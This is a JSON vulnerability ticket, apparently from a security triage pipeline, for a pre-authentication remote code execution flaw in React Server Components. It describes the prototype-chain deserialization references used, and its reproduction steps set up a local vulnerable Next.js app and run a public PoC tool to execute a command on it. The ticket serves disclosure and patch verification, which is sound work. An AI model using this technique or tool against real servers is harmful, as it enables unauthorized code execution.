{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": "HTTP request payload or parameters",
    "claimed_surface": "api_remote",
    "expected_impact": "code_execution",
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "endpoint",
    "submission_reason": "ticket_derived",
    "trigger_class": "service_api",
    "upstream_verdicts": null
  },
  "latest_description": "## Summary\nA pre-authentication remote code execution vulnerability affects React Server Components packages `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack` in versions 19.0.0, 19.1.0–19.1.1, and 19.2.0. The server-side decoding of React Server Function requests unsafely deserializes attacker-controlled payloads, allowing an unauthenticated attacker to craft a malicious HTTP request and achieve arbitrary code execution.\n\n## Details\nReact Server Components (Flight protocol) translate client requests into HTTP requests for Server Function endpoints. The vulnerable code path deserializes attacker-controlled `multipart/form-data` without sufficient validation, enabling prototype-chain manipulation that can reach the `Function` constructor (e.g., via crafted references such as `$1:__proto__:then` and `$1:constructor:constructor`). A single unauthenticated POST request containing a `Next-Action` header can trigger RCE on the server. This impacts applications that use React Server Components through frameworks/bundlers (e.g., Next.js App Router) when these packages are present.\n\n**Fixed versions:** 19.0.1, 19.1.2, and 19.2.1 (or later) of the affected packages.\n\n## Reproduction Steps (authorized testing only)\n**Environment:** Node.js 20+, npm, Python 3, a vulnerable RSC-enabled app (example: Next.js App Router). The steps below create a local vulnerable target and use a public PoC to verify exploitation.\n\n1) **Create a vulnerable Next.js app**\n```bash\nnpx create-next-app@15.4.0 rsc-vuln\ncd rsc-vuln\nnpm install react@19.2.0 react-dom@19.2.0 react-server-dom-webpack@19.2.0\n```\n\n2) **Add a simple Server Action to ensure a Server Function endpoint exists**\n`app/actions.ts`:\n```ts\n'use server';\nexport async function ping() {\n  return 'ok';\n}\n```\n`app/page.tsx`:\n```tsx\nimport { ping } from './actions';\nexport default function Page() {\n  return (\n    <form action={ping}>\n      <button type=\"submit\">Ping</button>\n    </form>\n  );\n}\n```\n\n3) **Run the vulnerable app**\n```bash\nnpm run dev\n```\n(Leave it running on `http://localhost:3000`.)\n\n4) **Clone and install the PoC tool**\n```bash\ngit clone https://github.com/rvzsec/react2shell\ncd react2shell\npip3 install -r requirements.txt\n```\n\n5) **Check and exploit**\n```bash\npython3 react2shell.py check -t http://localhost:3000\npython3 react2shell.py exec  -t http://localhost:3000 -c \"id\"\n```\n\n## Indicators of Success\n- The PoC reports the target as vulnerable.\n- The `exec` command returns output such as the server process user (`uid=`/`gid=`), confirming code execution.\n\n## Notes\n- If your application does not use React Server Components or does not run server-side React code, it is not affected.\n- Upgrade to patched versions immediately: 19.0.1, 19.1.2, or 19.2.1+.\n",
  "product": "npm:react-server-dom-webpack",
  "severity": "critical",
  "status": "open",
  "summary": "Pre-authentication RCE in React Server Components (react-server-dom-* 19.0.0–19.2.0) via unsafe deserialization of Server Function requests.",
  "ticket_id": "CVE-2025-55182"
}